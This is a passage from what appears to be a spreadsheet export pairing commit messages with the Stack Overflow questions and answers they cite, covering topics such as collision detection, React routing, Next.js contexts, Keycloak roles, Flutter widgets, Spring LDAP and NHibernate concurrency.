    (x3, y3), (x4, y4) = pos[2], pos[3]
    # Fonction pour vÃ©rifier si deux segments sont alignÃ©s et se chevauchent
    def is_between(a, b, c):
        return min(a, b) &amp;lt;= c &amp;lt;= max(a, b)
    # VÃ©rification si les segments sont alignÃ©s sur le mÃªme axe (horizontal, vertical ou diagonal)
    if (x1 == x2 == x3 == x4):  # vertical alignement
        return is_between(y1, y2, y3) or is_between(y1, y2, y4) or is_between(y3, y4, y1) or is_between(y3, y4, y2)
    return is_between(x1, x2, x3) or is_between(x1, x2, x4) or is_between(x3, x4, x1) or is_between(x3, x4, x2) #if no vertical alignement
def collision_check(vertices,E, r):
    vertices_proj = [v[:] for v in vertices]
    for i in range(len(vertices)):
        if i == (len(vertices)-1) :
            A = vertices_proj[i]
            B = vertices_proj[0]
        else :
            A = vertices_proj[i]
            B = vertices_proj[(i + 1)]
        pos = projections(A, B, E, r) #points = [[xa,ya],[xb,yb],[xf,yf],[xg,yg]]
        if check_overlap(pos) :
            return True
    return False
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm doing a golf game, so I'm trying to make a collision detection algorithm (SAT) for a polygon and a circle. This code can detect collision only if the shapes are roughly on the horizontal axis (here it works just fine). However, on the vertical axis, no matter the distance, they're considered to be touching (as long as a pixel of one shape is between the x coordinates of the other one)&lt;/p&gt;
&lt;p&gt;I'm trying to change the conditions in check_overlaps, but now I dont see any problems, so I don't know where is it&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C510</t>
  </si>
  <si>
    <t>fix CameraFocal by Parent Constraints component
https://stackoverflow.com/questions/52179975/make-child-unaffected-by-parents-rotation-unity
https://docs.unity3d.com/Manual/class-ParentConstraint.html</t>
  </si>
  <si>
    <t xml:space="preserve">I wonder how do the decentralized DVCS's work? If there is no central server how can a developer machine knows and syncs the repository with the other developer machines' repositories. And how does the changes are merged? Because lack of central server seems like to me the system might cause each repository have a different revision numbers. And how does the conflict resolutions are handled?
</t>
  </si>
  <si>
    <t>C511</t>
  </si>
  <si>
    <t>modified ticket-list-component.ts
- funktioniert nun
- verwendet event.currentTarget anstatt event.target (https://stackoverflow.com/questions/52177765/e-target-calling-wrong-target)
- refactor + hinzufügen von clicklistener</t>
  </si>
  <si>
    <t>Behavior is as expected. Per
MDN
,
event.target
is
A reference to the object that dispatched the event. It is different from
event.currentTarget
when the event handler is called during the bubbling or capturing phase of the event.
The innermost element that was clicked on was the
img
, so the
img
is the
target
of the event.
If you wanted a reference to the element the handler is on, use
e.currentTarget
instead:
$('.star-span').click(e =&gt; {
  console.log(e.currentTarget);
});
&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"&gt;&lt;/script&gt;
&lt;span class="star-span" id="1"&gt;
  	&lt;img class="star-img" width="15%" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/18/Five-pointed_star.svg/2000px-Five-pointed_star.svg.png" /&gt;
&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I find zoom (section and slide) links and their targets in the current PowerPoint presentation?&lt;/p&gt;
&lt;p&gt;Since I could not find documentation regarding how zoom links are implemented, I've created a test presentation for purposes of exploring and using the code snippet below, found that based on the shape name, it appears that the shape type I am interested in is -2.&lt;/p&gt;
&lt;p&gt;Sub ExtractZoomLinks()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim pptSlide As Slide
Dim pptShape As Shape
Dim output As String
' Loop through each slide in the presentation
For Each pptSlide In ActivePresentation.Slides
    ' Loop through each shape on the slide
    For Each pptShape In pptSlide.Shapes
        output = output &amp;amp; &amp;quot;Slide &amp;quot; &amp;amp; pptSlide.SlideIndex &amp;amp; &amp;quot;shape type&amp;quot; &amp;amp; pptshape.type &amp;amp; &amp;quot; Name:&amp;quot; &amp;amp; pptShape.Name &amp;amp; &amp;quot;, Link -&amp;gt; &amp;quot; &amp;amp; pptShape.ActionSettings(ppMouseClick).Hyperlink.Address &amp;amp; &amp;quot; || &amp;quot; &amp;amp; pptShape.ActionSettings(ppMouseClick).Hyperlink.SubAddress &amp;amp; &amp;quot;, show &amp;amp; return:&amp;quot; &amp;amp; pptShape.ActionSettings(ppMouseClick).Hyperlink.ShowAndReturn &amp;amp; vbCrLf 
   Next pptShape
Next pptSlide
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've set a watch on the shape object and can't seem to find any indicator that this is a zoom link or where the targets of the link are stored.&lt;/p&gt;
&lt;p&gt;Any help is appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C512</t>
  </si>
  <si>
    <t>Redis issue to be sorted out by including the Redis to go add on.
http://stackoverflow.com/questions/22484354/redis-celery-broker-not-reachable-when-deployed-on-heroku</t>
  </si>
  <si>
    <t>BROKER_URL = 'redis://127.0.0.1:6379/0' won't work on the heroku server. You need to install any of the two add-on in heroku for redis
https://addons.heroku.com/redistogo
https://addons.heroku.com/rediscloud
both add-ons provide free tier plan.
after that you can specify your brocker url
BROKER_URL = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')
so it will work on both local and heroku server.
You can find detailed documentation in
https://devcenter.heroku.com/articles/redistogo#install-redis-in-python
https://devcenter.heroku.com/articles/rediscloud#using-redis-from-python
One more thing. I personally prefer
redistogo
for the heroku. Because redistogo has got more features than rediscloud.
Note: There are more redis add-ons available in heroku. but they don't provide free tier plan. :)</t>
  </si>
  <si>
    <t xml:space="preserve">How do you deal with validation on complex aggregates in a domain driven design? Are you consolidating your business rules/validation logic?
I understand argument validation and I understand property validation which can be attached to the models themselves and do things like check that an email address or zipcode is valid or that a first name has a minimum and maximum length.
But what about complex validation that involves multiple models? Where do you typically place these rules &amp; methods within your architecture? And what patterns if any do you use to implement them?
</t>
  </si>
  <si>
    <t>C513</t>
  </si>
  <si>
    <t xml:space="preserve"> did the trick for client component importing from page by creating 
ThemeContext component, ref from https://stackoverflow.com/questions/76181096/typeerror-createcontext-only-works-in-client-components-add-the-use-client-d</t>
  </si>
  <si>
    <t>Obviously, the button you are importing is using client-side hooks,
createContext
in this case. For this to work, you need to add
"use client"
at the top of the file. But it would mean the page becomes a
Client Component
, and no longer a
Server Component
.
If that bothers you, you could, for example, create a
lib
folder at the same level as
app
in which you add a
mui.js
file, like so:
// lib/mui.js
"use client";
export * from "@mui/material";
And you import it from there (this way, other parts of the page are still Server Components):
// app/page.js
import { Button } from "../lib/mui";
export default function Home() {
  return (
    &lt;div&gt;
      &lt;Button variant="contained"&gt;Hello World&lt;/Button&gt;
    &lt;/div&gt;
  );
}
Side note, you may get a similar error while setting up a context. It means you are trying to set it up in a Server Component. The
guideline
is to add it in its own "use client" marked file:
// app/theme-provider.tsx
"use client";
import { createContext } from "react";
export const ThemeContext = createContext("");
export default function ThemeProvider({ children }) {
  return (
    &lt;ThemeContext.Provider value="dark"&gt;
      {children}
    &lt;/ThemeContext.Provider&gt;
  );
}
And import it from there:
// app/layout.js
import ThemeProvider from './theme-provider';
export default function RootLayout({ children }) {
  return (
    &lt;html&gt;
      &lt;body&gt;
        &lt;ThemeProvider&gt;{children}&lt;/ThemeProvider&gt;
      &lt;/body&gt;
    &lt;/html&gt;
  );
}
For an even more elaborate answer, check out this
thread
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have installed Visual Studio 2022. By creating a new ASP.NET web application (.NET Framework), I insert an Html table inside an &lt;code&gt;.aspx&lt;/code&gt; file, its &lt;code&gt;Style&lt;/code&gt; property is practically blocked and clicking on the button as in the photo doesn't open anything.&lt;/p&gt;
&lt;p&gt;It only works if I select &amp;quot;Legacy Web Form designer&amp;quot; from Tools-Options-WebForm Designer, while if the option (which interests me) &amp;quot;Web Dynamic Preview&amp;quot; is selected it doesn't work...&lt;/p&gt;
&lt;p&gt;Can you help me? Thank you all.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/XFgKVDcg.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/XFgKVDcg.png" alt="Screenshot" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C514</t>
  </si>
  <si>
    <t>Retrieving data from API
There are multiple ways to retrieve user. So far I came across two options (loadUserProfile in Home.jsx and init with parsedToken in Auth.jsx). Today I need to redesign Key Cloak's login page and then find the solution how to stay in session on Dashboard as well on how to retrieve real role data. I might find some help here: https://stackoverflow.com/questions/40285305/get-roles-of-logged-in-user-in-keycloak</t>
  </si>
  <si>
    <t>the loadUserInfo does not provide the roles of the user you may use the keycloak-js and get the roles by tokenParsed
var Keycloak = require('keycloak-js');
var kc = Keycloak('./keycloak.json');
kc.init().success(function(authenticated) {
   alert(JSON.stringify(kc.tokenParsed)); 
}).error(function() {
            alert('failed to initialize');
});</t>
  </si>
  <si>
    <t xml:space="preserve">I want to build a shop in which the products have a little wizard through which the price then is determined. In this case I'm talking about printing products.
So for (a little) example when you come to the shop and want to print a business card, you get to decide if you want to print black and white or in color, if you want to choose thick paper or thin, if you want to print 100, 200, 500 or 1000 pieces and so on.
After all there will be a price for let's say: black and white, thick paper, 200 piece =&gt; 40,-$
In real you have many more choices to choose from. So as you can think there are many many prices, for which there is no formula.
So my question is: How can I handle the prices?
My first idea: Decorator Pattern.
But when I thought about it, it's not a very good idea. As I told there is no real formula, also I have to generate the wizard (which may be different if you want to print greeting cards). Also I want to be able to change the price trough a admin interface or add a product or add a new "decision" like "do you want glossy paper?" to a product or remove one (and still keep the prices intact).
So now I'm thinking about using a tree for each product in which I can add a level (a new decision), resort levels and so on.
Another Idea is to Build some Kind of Key-Objects through the decisions and look the price up in a Price table. A bit like a Dictionary in which I add the decisions and after all I generate a key out of it to look up the price in a price table. 
So before prototyping I was wondering if I'm just blind and I don't see the obvious solution or maybe there is another way which is more elegant I don't know about?
</t>
  </si>
  <si>
    <t>C515</t>
  </si>
  <si>
    <t>- Protected route (view App.js for how to use)
- ref: https://stackoverflow.com/questions/69864165/error-privateroute-is-not-a-route-component-all-component-children-of-rou</t>
  </si>
  <si>
    <t>I ran into the same issue today and came up with the following solution based on this very helpful article by Andrew Luca
In PrivateRoute.js:
import React from 'react';
import { Navigate, Outlet } from 'react-router-dom';
const PrivateRoute = () =&gt; {
    const auth = null; // determine if authorized, from context or however you're doing it
    // If authorized, return an outlet that will render child elements
    // If not, return element that will navigate to login page
    return auth ? &lt;Outlet /&gt; : &lt;Navigate to="/login" /&gt;;
}
In App.js (I've left in some other pages as examples):
import './App.css';
import React, {Fragment} from 'react';
import {BrowserRouter as Router, Route, Routes} from 'react-router-dom';
import Navbar from './components/layout/Navbar';
import Home from './components/pages/Home';
import Register from './components/auth/Register'
import Login from './components/auth/Login';
import PrivateRoute from './components/routing/PrivateRoute';
const App = () =&gt; {
  return (
    &lt;Router&gt;
      &lt;Fragment&gt;
        &lt;Navbar/&gt;
        &lt;Routes&gt;
          &lt;Route exact path='/' element={&lt;PrivateRoute/&gt;}&gt;
            &lt;Route exact path='/' element={&lt;Home/&gt;}/&gt;
          &lt;/Route&gt;
          &lt;Route exact path='/register' element={&lt;Register/&gt;}/&gt;
          &lt;Route exact path='/login' element={&lt;Login/&gt;}/&gt;
        &lt;/Routes&gt;
      &lt;/Fragment&gt;
    &lt;/Router&gt;
  );
}
In the above routing, this is the private route:
&lt;Route exact path='/' element={&lt;PrivateRoute/&gt;}&gt;
      &lt;Route exact path='/' element={&lt;Home/&gt;}/&gt;
&lt;/Route&gt;
If authorization is successful, the &lt;Home/&gt; element will show. Otherwise, it will navigate to the login page.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have multiple textareas on a web page like below. What happens is when you type into one of the textareas, there is a delay which triggers on keyup and then takes the text in the textarea and sends it to an AJAX call to save it. The ajax call and saving is working fine.&lt;/p&gt;
&lt;p&gt;The issue is if I type in more than one textarea before the delay trigger runs, only the last textarea I type in is sent to an ajax call.&lt;/p&gt;
&lt;p&gt;Currently what is happening:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Type in textarea 1&lt;/li&gt;
&lt;li&gt;Type in textarea 2&lt;/li&gt;
&lt;li&gt;Only changes in textarea 2 are sent to ajax call&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What should happen:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Type in textarea 1 and changes trigger call ajax call to save changes&lt;/li&gt;
&lt;li&gt;Type in textarea 2 and changes trigger call ajax call to save changes&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Typing into textarea 2 should not affect the saving of textarea 1.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HTML&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div data-mid=&amp;quot;123&amp;quot;&amp;gt;
    &amp;lt;div class=&amp;quot;box&amp;quot; data-id=&amp;quot;1&amp;quot;&amp;gt;
        &amp;lt;textarea class=&amp;quot;note&amp;quot; placeholder=&amp;quot;...write something&amp;quot;&amp;gt;123&amp;lt;/textarea&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class=&amp;quot;box&amp;quot; data-id=&amp;quot;2&amp;quot;&amp;gt;
        &amp;lt;textarea class=&amp;quot;note&amp;quot; placeholder=&amp;quot;...write something&amp;quot;&amp;gt;1234&amp;lt;/textarea&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class=&amp;quot;box&amp;quot; data-id=&amp;quot;3&amp;quot;&amp;gt;
        &amp;lt;textarea class=&amp;quot;note&amp;quot; placeholder=&amp;quot;...write something&amp;quot;&amp;gt;12345&amp;lt;/textarea&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class=&amp;quot;box&amp;quot; data-id=&amp;quot;4&amp;quot;&amp;gt;
        &amp;lt;textarea class=&amp;quot;note&amp;quot; placeholder=&amp;quot;...write something&amp;quot;&amp;gt;123456&amp;lt;/textarea&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Javascript&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function delay(callback, ms) {
    var timer = 0;
    return function() {
        var context = this, args = arguments;
        clearTimeout(timer);
        timer = setTimeout(function () {
            callback.apply(context, args);
        }, ms || 0);
    };
}
function save(rootNode)
{
    var note = rootNode.val();
    ajaxCall(null, 2, note, false);
}
$('.box').on('keyup', 'textarea', delay(function(event) {
    save($(this));
}, 2000));
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C516</t>
  </si>
  <si>
    <t>adding header component to registeration page.
References:
* https://stackoverflow.com/questions/70115982/cannot-nextjs-component-link-using-styled-components</t>
  </si>
  <si>
    <t xml:space="preserve">The next.js Link doesn't take any styles but you can style the children eg a and add passHref to the Link when using a custom compoment. The styles of the child will be applied to the parent i.e Link. However, you can style the react-router-dom Link, NavLink like what you did above. In next.js you can do it like this
import Link from 'next/link'
const CustomLink = styled.a `
    color: white;
    background: red;
`
&lt;Link href="/" passHref&gt;
    &lt;CustomLink&gt;Home&lt;/CustomLink&gt;
&lt;/Link&gt;
The next.js Link doesn't take any styles but you can style the children eg a and add passHref to the Link when using a custom compoment. The styles of the child will be applied to the parent i.e Link. However, you can style the react-router-dom Link, NavLink like what you did above. In next.js you can do it like this
import Link from 'next/link'
const CustomLink = styled.a `
    color: white;
    background: red;
`
&lt;Link href="/" passHref&gt;
    &lt;CustomLink&gt;Home&lt;/CustomLink&gt;
&lt;/Link&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on a relatively small asp.net web application and am wondering if there is really a need to employ full n-tier architecture.  For an idea of size; there are about 20 database tables.
In the past I have used a 2-tier approach where business logic and data access are grouped together into a single class library with was an asp.net web application forming the UI tier and this seemed to work OK.
Is there a threshold size or some rule of thumb where you should employ n-tier?
</t>
  </si>
  <si>
    <t>C517</t>
  </si>
  <si>
    <t>Update part5b.md
avoid using "ref" to avoid the "Function components cannot be given refs" warning.
https://stackoverflow.com/questions/56484686/how-do-i-avoid-function-components-cannot-be-given-refs-when-using-react-route</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can clone a repo with all of its refs by using the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;git clone --mirror ssh://some.remote.server/some-repo.git cloned-repo/.git
cd cloned-repo
git config --bool core.bare false
git checkout some-branch
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Is it possible to fetch &lt;em&gt;all refs&lt;/em&gt; from a remote, in a repo that has already been cloned?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Note that &amp;quot;all refs&amp;quot; means &lt;code&gt;refs/*&lt;/code&gt;, which includes but isn't limited to branches and tags. For example, some remotes use &lt;code&gt;refs/contrib/$merge_request_id/versions/$version&lt;/code&gt; or &lt;code&gt;refs/pull/$pull_request_id/head&lt;/code&gt; to store merge requests.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C518</t>
  </si>
  <si>
    <t>feat: Add public beta disclaimer
- The wallet is initialized once the toggles are confirmed on the welcome screen. (This fixes a bug, where the user could have restarted the app to skip over the disclaimer and uses the loading screen to show that the app is doing something)
- Add a custom switch component. Primarily copied from https://stackoverflow.com/a/60090216/8643355</t>
  </si>
  <si>
    <t>Create a custom switch class
class CustomSwitch extends StatefulWidget {
  final bool value;
  final ValueChanged&lt;bool&gt; onChanged;
  CustomSwitch({Key? key, required this.value, required this.onChanged})
      : super(key: key);
  @override
  _CustomSwitchState createState() =&gt; _CustomSwitchState();
}
class _CustomSwitchState extends State&lt;CustomSwitch&gt;
    with SingleTickerProviderStateMixin {
  Animation? _circleAnimation;
  AnimationController? _animationController;
  @override
  void initState() {
    super.initState();
    _animationController =
        AnimationController(vsync: this, duration: Duration(milliseconds: 60));
    _circleAnimation = AlignmentTween(
            begin: widget.value ? Alignment.centerRight : Alignment.centerLeft,
            end: widget.value ? Alignment.centerLeft : Alignment.centerRight)
        .animate(CurvedAnimation(
            parent: _animationController!, curve: Curves.linear));
  }
  @override
  Widget build(BuildContext context) {
    return AnimatedBuilder(
      animation: _animationController!,
      builder: (context, child) {
        return GestureDetector(
          onTap: () {
            if (_animationController!.isCompleted) {
              _animationController!.reverse();
            } else {
              _animationController!.forward();
            }
            widget.value == false
                ? widget.onChanged(true)
                : widget.onChanged(false);
          },
          child: Container(
            width: 45.0,
            height: 28.0,
            decoration: BoxDecoration(
              borderRadius: BorderRadius.circular(24.0),
              color: _circleAnimation!.value == Alignment.centerLeft
                  ? Colors.grey
                  : Colors.blue,
            ),
            child: Padding(
              padding: const EdgeInsets.only(
                  top: 2.0, bottom: 2.0, right: 2.0, left: 2.0),
              child: Container(
                alignment:
                    widget.value ? ((Directionality.of(context) == TextDirection.rtl) ? Alignment.centerRight : Alignment.centerLeft ) : ((Directionality.of(context) == TextDirection.rtl) ? Alignment.centerLeft : Alignment.centerRight),
                child: Container(
                  width: 20.0,
                  height: 20.0,
                  decoration: BoxDecoration(
                      shape: BoxShape.circle, color: Colors.white),
                ),
              ),
            ),
          ),
        );
      },
    );
  }
}
Call this class as widget and use the value parameter to set the state of the switch
bool _enable = false;
CustomSwitch(
   value: _enable,
   onChanged: (bool val){
      setState(() {
         _enable = val;
      });
   },
),</t>
  </si>
  <si>
    <t xml:space="preserve">I have been playing around with the EF to see what it can handle. Also many articles and posts explain the various scenarios in which the EF can be used, however if miss the "con" side somehow. Now my question is, in what kind of scenarios should I stay away from the Entity Framework ?
If you have some experience in this field, tell me what scenarios don't play well with the EF. Tell me about some downsides you experienced where you whished you would have chosen a different technology.
</t>
  </si>
  <si>
    <t>C519</t>
  </si>
  <si>
    <t>[TS] Use ReactElement instead of ReactNode for InfoPanel (#8959)
This prevents errors about "ReactNode is not a valid JSX element"
similar to https://stackoverflow.com/questions/72392225/reactnode-is-not-a-valid-jsx-element
The component always returns a single element, so changing the
return from ReactNode to ReactElement is more descriptive at any</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;[EDIT] It was my fault: I had garbled the configuration of Jena-Fuseki and the &lt;code&gt;tdb2:unionDefaultGraph&lt;/code&gt; parameter was NOT set to &lt;code&gt;true&lt;/code&gt;. So no wonder that Jena didn't return the expected results. Also, and I hate to admit it, I hadn't checked the configuration with a simple query for all triples. Sorry for the noise!&lt;/p&gt;
&lt;hr/&gt;
I'm struggling to get a query to work in Jena. The query is composed of two parts:
&lt;ul&gt;
&lt;li&gt;a sub-select checks for a given graph in which other graphs it is virtually &amp;quot;nested&amp;quot;, by means of an &lt;code&gt;:in&lt;/code&gt; relation&lt;/li&gt;
&lt;li&gt;the main query then checks for each nesting graph returned by the sub-select if the given graph is attributed in that nesting graph.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This query works as intended in a handful of RDF stores, in some others it returns slightly unexpected results and in a few it doesn't work at all. Among the latter is Jena, but with Jena I'm not sure why, and if I'm doing something wrong.&lt;/p&gt;
&lt;p&gt;The query depends on the availability of a default graph as the union of all named graphs. Jena's TDB2 can be configured to provide that with the &lt;code&gt;tdb2:unionDefaultGraph true&lt;/code&gt; parameter and so I did (in a Docker container of &lt;a href="https://hub.docker.com/r/stain/jena-fuseki" rel="nofollow noreferrer"&gt;stain/jena-fuseki:latest&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;This is the example data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PREFIX :   &amp;lt;http://ex.org&amp;gt; .
GRAPH :A { :A :pA :DS .}
GRAPH :B { :A :in :B .
           :A :pB :DN .}
GRAPH :C { :B :in :C .}
GRAPH :D { :C :in :D .
           :A :pD :DN .}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the query with both components, sub-select and main query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PREFIX :   &amp;lt;http://ex.org&amp;gt; 
SELECT DISTINCT ?graph ?prop ?val ?nesting
# FROM &amp;lt;urn:x-arq:UnionGraph&amp;gt;
WHERE {
    BIND ( :A AS ?graph ) .
    # subquery to collect the graphs in which ?graph is nested
    { SELECT ?graph ?nesting WHERE {
        ?graph :in* ?path .
        ?path  :in+ ?nesting . 
    } }
    # attributions on graph :A in graphs in which it is nested
    GRAPH ?nesting { ?graph ?prop ?val }
    FILTER ( ?prop != :in )
} ORDER BY ?prop
# expected results
# graph     prop    val     nesting
# :A        :pB     :DN     :B   
# :A        :pD     :DN     :D   
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In Jena this query doesn't return any results, neither with nor without FROM clause.&lt;/p&gt;
&lt;p&gt;I tested the two components separately from each other. First the sub select:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PREFIX :   &amp;lt;http://ex.org&amp;gt;
SELECT DISTINCT ?graph ?nesting
FROM &amp;lt;urn:x-arq:UnionGraph&amp;gt;
WHERE {
    BIND ( :A AS ?graph ) .
    ?graph :in* ?path .
    ?path  :in+ ?nesting . 
} ORDER BY ?nesting
# expected results
# graph     nesting
# :A        :B
# :A        :C
# :A        :D
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The sub-select works as expected with FROM clause, but  doesn't return any results without FROM clause.&lt;/p&gt;
&lt;p&gt;Then the main query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PREFIX :   &amp;lt;http://ex.org&amp;gt;
SELECT DISTINCT ?graph ?prop ?val ?nesting
# FROM &amp;lt;urn:x-arq:UnionGraph&amp;gt;
WHERE {
    BIND ( :A AS ?graph ) .
    GRAPH ?nesting { ?graph ?prop ?val }
    FILTER ( ?prop != :in )
} ORDER BY ?graph ?nesting
# expected results
# graph     prop    val       nesting  
# :A        :pA     :DS       :A 
# :A        :pB     :DN       :B
# :A        :pD     :DN       :D
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This query doesn't return any results with FROM clause, but works as expected without FROM clause.&lt;/p&gt;
&lt;p&gt;So it seems that the sub-select query depends on the &lt;code&gt;FROM&lt;/code&gt; clause to refer to the union default graph while the the main query only works without such a reference. Is that right, and if yes: there a way around this dilemma?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C52</t>
  </si>
  <si>
    <t>LDAP Sample
https://stackoverflow.com/questions/54723718/automate-login-to-site-using-spring-boot-spring-security-and-ldap</t>
  </si>
  <si>
    <t>For your convenience, this answer comes with a complete and working sample, including an LDAP server, populated with users and groups and an integration test, so that you can run these tests yourself.
Assume you have the following user in LDAP
dn: cn=marissa,ou=Users,dc=test,dc=com
changetype: add
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
cn: marissa
userPassword: koala
uid: 20f459e0-e30b-4d1f-998c-3ded7f769db1
mail: marissa@test.com
sn: Marissa
The username is marissa and the password is koala.
Let's start with the test case:
	@Test
	@DisplayName("ldap login works")
	void doLogin() throws Exception {
		mvc.perform(
			MockMvcRequestBuilders.post("/login")
				.param("username", "marissa")
				.param("password", "koala")
				.with(csrf())
		)
			.andExpect(status().is3xxRedirection())
			.andExpect(authenticated())
		;
	}
From this test, we can deduce that
LDAP uses form login, username/password
The form has CSRF protection
So let's configure your Spring Boot application using Java config
The classic sample file, SecurityConfig.java
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
The security configuration doesn't change.
We want users to be fully authenticated
We want to use form login
	@Override
	protected void configure(HttpSecurity http) throws Exception {
		http
			.authorizeRequests()
				.anyRequest()
				.fullyAuthenticated()
				.and()
			.formLogin()
		;
	}
That's it, next we configure LDAP, again in your SecurityConfig.java we do this by calling the AuthenticationManagerBuilder. This is a bean that Spring Security configures. So we can access it using @Autowired
	@Autowired
	public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
		auth
			.ldapAuthentication()
				.contextSource()
					.url("ldap://localhost:389")
					.managerDn("cn=admin,dc=test,dc=com")
					.managerPassword("password")
					.and()
				.userSearchBase("ou=Users,dc=test,dc=com")
				.userSearchFilter("cn={0}")
				.groupSearchBase("dc=test,dc=com")
				.groupSearchFilter("member={0}")
		;
	}
and that's it. Now, I used some code I wrote from the Cloud Foundry UAA project to create an in memory LDAP server for my integration tests.
So when the mock MVC integration test starts up, it starts an LDAP server to run against.
It really is that simple. You can now expand this sample to map LDAP groups to Spring Security authorities.
The LDAP Sample is available in my community repo: https://github.com/fhanik/spring-security-community.git</t>
  </si>
  <si>
    <t xml:space="preserve">I have a small form displaying the DataLayoutControl component. 
If I use a GridControl the objects get saved. If I use the DataLayoutControl (which shows them individually) they do not get saved after they are changed. The underlying object is changed after the user interface edits, but doesn't get saved. 
How can I enable this ?
PS: I have tried UnitOfWork.CommitChanges (i have one uow going through the whole architecture) to no avail. 
</t>
  </si>
  <si>
    <t>C520</t>
  </si>
  <si>
    <t>add: dependency checker component
https://stackoverflow.com/questions/33297857/how-to-check-dependency-in-bash-script</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on a large application that manages complex 'events' with quite a bit of data.
The application is broken into a client (C# mainly .NET 2.0 mainly), a WCF based server made to run on IIS (web services at this layer), and a data back end that is NHibernate based with an MS SQL Server database backend.
We are encountering a bug with the follow scenario:
Multiple users (in this case 6, in our testing) simultaneously save a persisted object (such as an event) on the client. (This is done via a verbal countdown, so we're talking a second or so difference due to reaction times)
When they save objects on the client, the client calls the server to save that object. The server does any business logic required, and then commits the change via NHibernate.
In this situation (multiple saves over service calls) some clients will come back with an unhanded exception:
"Row was updated or deleted by another transaction"
Which is an NHibernate exception.
In my research I found some instances of this error, but it was always sequential. Our application is fine sequentially, this only happens with simultaneous saves.
How should multiple simultaneous NHibernate transactions be protected from each other?
(This is going to be a high volume application, so minimal needed locking is good. We can't afford to lock all saves generally.)
Are there NHibernate settings that would do this? Do we need to figure out some server code side locking before hand? Can the database handle this with perhaps with different transaction protection settings?
This is a bear to test, like most threading issues, hence the research/theory approach. What is the experience with an architecture like this?
Edit: Further information and a theory.
It seems that changing values that are directly in the table as the main entity did not cause this problem, while changing elements that are accessed through a join did. (In this case a set of attributes).
Our working theory that seems to fit this situation is the following:
Multiple saves come in for the same event. Each one gets a copy of the existing event (to modify). The first ones to save are OK. The later ones, however, have updates such as the addition or deletion of attributes (which are a join table) and discover that the add or delete that needs done has already been done, and bails out because another transaction edited the event.
How should we keep these events in sync?
</t>
  </si>
  <si>
    <t>C521</t>
  </si>
  <si>
    <t>Put ShowMore blocks back in long Asides
Turns out all you have to do to put markdown content inside of a
component in MDX is to leave a blank line between the component tag and
the markdown.
  &lt;MyComponent&gt;
    ```js
    foobar
    ```
  &lt;/MyComponent&gt;
See: https://stackoverflow.com/q/67388050/2517147</t>
  </si>
  <si>
    <t>I found the solution here, I just needed to add a new line between the tags like this:
&lt;Component&gt;
**Generated HTML**
&lt;/Component&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a project that uses nodes and plots. I chose to use ImGui alongside ImPlots and imgui-node-editor.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/ocornut/imgui" rel="nofollow noreferrer"&gt;https://github.com/ocornut/imgui&lt;/a&gt; (Docking branch)&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/epezent/implot" rel="nofollow noreferrer"&gt;https://github.com/epezent/implot&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/thedmd/imgui-node-editor" rel="nofollow noreferrer"&gt;https://github.com/thedmd/imgui-node-editor&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I want to be able to embed an ImPlot plot into an imgui-node-editor node&lt;/p&gt;
&lt;p&gt;Assuming everything is set up correctly, which it is.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ax::NodeEditor::BeginNode(1);
if (ImPlot::BeginPlot(&amp;quot;BlankPlot&amp;quot;)) {
